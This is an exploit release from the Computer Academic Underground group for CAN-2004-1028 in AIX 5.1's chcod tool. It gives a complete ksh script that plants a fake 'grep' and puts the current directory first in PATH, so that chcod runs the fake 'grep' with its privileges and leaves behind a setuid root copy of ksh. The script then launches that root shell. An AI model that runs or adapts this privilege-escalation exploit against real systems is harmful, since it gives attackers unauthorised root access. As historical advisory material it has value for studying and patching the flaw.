____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground http://www.caughq.org Exploit Code ===============/======================================================== Exploit ID: CAU-EX-2004-0005 Release Date: 2004.12.23 Title: chcod-suidshell.sh Description: chcod Trusted $PATH SUID Shell Creation Tested: chcod on AIX 5.1.0 Attributes: Privileged Access Exploit URL: http://www.caughq.org/exploits/CAU-EX-2004-0005.txt Author/Email: I)ruid ===============/======================================================== Description =========== This script exploit writes out a simple shell script named 'grep' which copies ksh, sets ownership to root, and sets the suit bit on it, thus creating a suid shell. The exploit then executes 'chcod' which executes our malicious 'grep' without dropping privileges via a modified $PATH environment variable. Afterward it cleans up it's mess and executes the suid shell for convenience. Notes ===== This exploit is written assuming your target shell is ksh. Credits ======= iDEFENSE Labs is credited with this discovery. References ========== http://www.idefense.com/application/poi/display?id=170 &type=vulnerabilities http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1028 Exploit ======= #!/usr/bin/ksh # # chcod-suidshell.sh - I)ruid [CAU] (12.2004) # # Exploits AIX's chcod tool which does not drop privs prior to # executing 'grep' via trusted $PATH environment variable. # echo "Creating malicious 'grep'" cat > ./grep << __EOF__ #!/usr/bin/ksh cp /usr/bin/ksh ./ksh chown root:system ./ksh chmod 6755 ./ksh __EOF__ chmod 700 ./grep echo "Setting up malicious PATH environment" export PATHSAVE=$PATH export PATH=.:$PATH echo "Executing /usr/sbin/chcod" /usr/sbin/chcod echo "Cleaning up our mess..." rm ./grep export PATH=$PATHSAVE export PATHSAVE= echo "Executing suid shell:" ./ksh